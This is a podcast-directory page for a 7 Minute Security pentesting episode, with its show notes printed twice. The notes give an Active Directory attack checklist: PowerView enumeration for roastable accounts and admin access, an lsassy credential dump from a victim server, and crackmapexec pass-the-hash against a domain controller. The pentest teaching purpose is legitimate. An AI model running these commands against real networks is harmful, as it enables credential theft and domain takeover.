This is the audio podcast version of Troy Hunt's weekly update video published here: https://www.troyhunt.com/tag/weekly-update/
…
continue reading
内容由Brian Johnson提供。所有播客内容(包括剧集、图形和播客描述)均由 Brian Johnson 或其播客平台合作伙伴直接上传和提供。如果您认为有人在未经您许可的情况下使用您的受版权保护的作品,您可以按照此处概述的流程进行操作https://zh.player.fm/legal。
类似 7 Minute Security 的节目
This feed includes all episodes of Paul's Security Weekly, Enterprise Security Weekly, Business Security Weekly, Application Security Weekly, and Security Weekly News! Your one-stop shop for all things Security Weekly!
…
continue reading
Daily update on current cyber security threats
…
continue reading
Android Backstage, a podcast by and for Android developers. Hosted by developers from the Android engineering team, this show covers topics of interest to Android programmers, with in-depth discussions and interviews with engineers on the Android team at Google. Subscribe to Android Developers YouTube → https://goo.gle/AndroidDevs
…
continue reading
Agile for Humans™ is a weekly podcast dedicated to the individuals and interactions that make agile work. The goal is to help create safe and collaborative working environments where people are empowered to do their best work.
…
continue reading
The award-winning WIRED UK Podcast with James Temperton and the rest of the team. Listen every week for the an informed and entertaining rundown of latest technology, science, business and culture news. New episodes every Friday.
…
continue reading
Show notes are at https://stevelitchfield.com/sshow/chat.html
…
continue reading
Hungry for Technology Talk? Get All You Can Eat at the Android Buffet
…
continue reading
A podcast featuring panelists of engineers from Netflix, Twitch, & Atlassian talking over drinks about all things software engineering.
…
continue reading
A podcast about web design and development.
…
continue reading
Player FM -播客应用
使用Player FM应用程序离线!
使用Player FM应用程序离线!
))
7MS #457: Tales of Internal Network Pentest Pwnage - Part 25
Manage episode 286533818 series 1288763
内容由Brian Johnson提供。所有播客内容(包括剧集、图形和播客描述)均由 Brian Johnson 或其播客平台合作伙伴直接上传和提供。如果您认为有人在未经您许可的情况下使用您的受版权保护的作品,您可以按照此处概述的流程进行操作https://zh.player.fm/legal。
Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:
- Get a cmd.exe spun up in the context of your AD user account:
Then get some important info in PowerView:
Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!
Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!
Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!
Once you know where you have local admin access, lsassy is your friend:
- lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server
Did you get an admin's NTLM hash from this dump? Then do this:
- crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED
(Pwn3d!) FTW!
619集单集
分享
Manage episode 286533818 series 1288763
内容由Brian Johnson提供。所有播客内容(包括剧集、图形和播客描述)均由 Brian Johnson 或其播客平台合作伙伴直接上传和提供。如果您认为有人在未经您许可的情况下使用您的受版权保护的作品,您可以按照此处概述的流程进行操作https://zh.player.fm/legal。
Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:
- Get a cmd.exe spun up in the context of your AD user account:
Then get some important info in PowerView:
Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!
Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!
Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!
Once you know where you have local admin access, lsassy is your friend:
- lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server
Did you get an admin's NTLM hash from this dump? Then do this:
- crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED
(Pwn3d!) FTW!
619集单集
All episodes
×
欢迎使用Player FM
Player FM正在网上搜索高质量的播客,以便您现在享受。它是最好的播客应用程序,适用于安卓、iPhone和网络。注册以跨设备同步订阅。
类似 7 Minute Security 的节目
This is the audio podcast version of Troy Hunt's weekly update video published here: https://www.troyhunt.com/tag/weekly-update/
…
continue reading
This feed includes all episodes of Paul's Security Weekly, Enterprise Security Weekly, Business Security Weekly, Application Security Weekly, and Security Weekly News! Your one-stop shop for all things Security Weekly!
…
continue reading
Daily update on current cyber security threats
…
continue reading
Android Backstage, a podcast by and for Android developers. Hosted by developers from the Android engineering team, this show covers topics of interest to Android programmers, with in-depth discussions and interviews with engineers on the Android team at Google. Subscribe to Android Developers YouTube → https://goo.gle/AndroidDevs
…
continue reading
Agile for Humans™ is a weekly podcast dedicated to the individuals and interactions that make agile work. The goal is to help create safe and collaborative working environments where people are empowered to do their best work.
…
continue reading
The award-winning WIRED UK Podcast with James Temperton and the rest of the team. Listen every week for the an informed and entertaining rundown of latest technology, science, business and culture news. New episodes every Friday.
…
continue reading
Show notes are at https://stevelitchfield.com/sshow/chat.html
…
continue reading
Hungry for Technology Talk? Get All You Can Eat at the Android Buffet
…
continue reading
A podcast featuring panelists of engineers from Netflix, Twitch, & Atlassian talking over drinks about all things software engineering.
…
continue reading
A podcast about web design and development.
…
continue reading
Player FM -播客应用
使用Player FM应用程序离线!
使用Player FM应用程序离线!
